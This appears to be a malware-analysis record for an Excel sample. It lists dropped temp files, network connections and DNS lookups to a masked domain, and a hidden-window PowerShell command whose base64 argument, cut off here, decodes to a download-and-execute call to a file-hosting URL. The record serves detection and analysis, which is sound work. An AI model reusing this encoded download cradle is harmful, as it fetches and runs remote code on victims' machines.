Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAAkAaAB0AHQAcABzADoALwAvAHQAbQBwAGYAaQBsAGUAcwAuAG8AcgBnAC8AZABsA...
- %TEMP%\24b0.tmp
- <Current directory>\3d411000
- %TEMP%\4df2.tmp
- %TEMP%\24b0.tmp
- %TEMP%\4df2.tmp
- <PATH_SAMPLE>.xls
- 'tm###les.org':443
- 'tm###les.org':443
- DNS ASK tm###les.org
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAAkAaAB0AHQAcABzADoALwAvAHQAbQBwAGYAaQBsAGUAcwAuAG8AcgBnAC8AZABsA...' (with hidden window)